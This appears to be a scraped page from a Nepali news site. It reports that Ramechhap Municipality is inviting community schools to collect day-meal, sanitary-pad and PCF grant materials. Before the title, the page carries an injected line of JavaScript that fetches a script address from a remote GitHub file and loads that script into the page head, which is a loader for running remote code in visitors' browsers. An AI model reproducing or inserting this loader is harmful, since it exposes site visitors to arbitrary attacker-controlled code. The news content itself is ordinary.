;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछाप नगरपालिकाको, सामुदायीक विद्यालयहरुलाई दिवा खाजा र सेनेटरी प्याड एवं पीसिएफ अनुदान लिन आह्वन (सूचनासहित) – जुनेली न्युज
बिहिबार, असार २७, २०८२
  • होमपेज
  • रामेछाप नगरपालिकाको, सामुदायीक विद्यालयहरुलाई दिवा खाजा र सेनेटरी प्याड एवं पीसिएफ अनुदान लिन आह्वन (सूचनासहित)
अर्थ/वाणिज्य

रामेछाप नगरपालिकाको, सामुदायीक विद्यालयहरुलाई दिवा खाजा र सेनेटरी प्याड एवं पीसिएफ अनुदान लिन आह्वन (सूचनासहित)

मंसिर १४,

रामेछाप  । रामेछाप जिल्लाको रामेछाप नगरपालिकाले दिवा खाजा र सेनेटरी प्याड वितरण एवं पिसिएफ अनुदानको लागि आफ्नो मातहतका सामुदायिक विद्यालयहरुलाई आह्वन गरेको छ ।

आइतबार एक सूचना मार्फत नगरपालिकाले चालुआर्थिक वर्षमा विद्यलयहरुले आफूले बुझाएको विवरणको आधारमा सामाग्री पाउने छन् । कोरोना भाइरस संक्रमणका कारण लामो समय रोकिएको विद्यालयहरु संचालनमा आएसंगै सामाग्री बुझ्नको लागि नगरपालिकाले आह्वन गरेको हो ।

फेसबुक प्रतिक्रियाहरु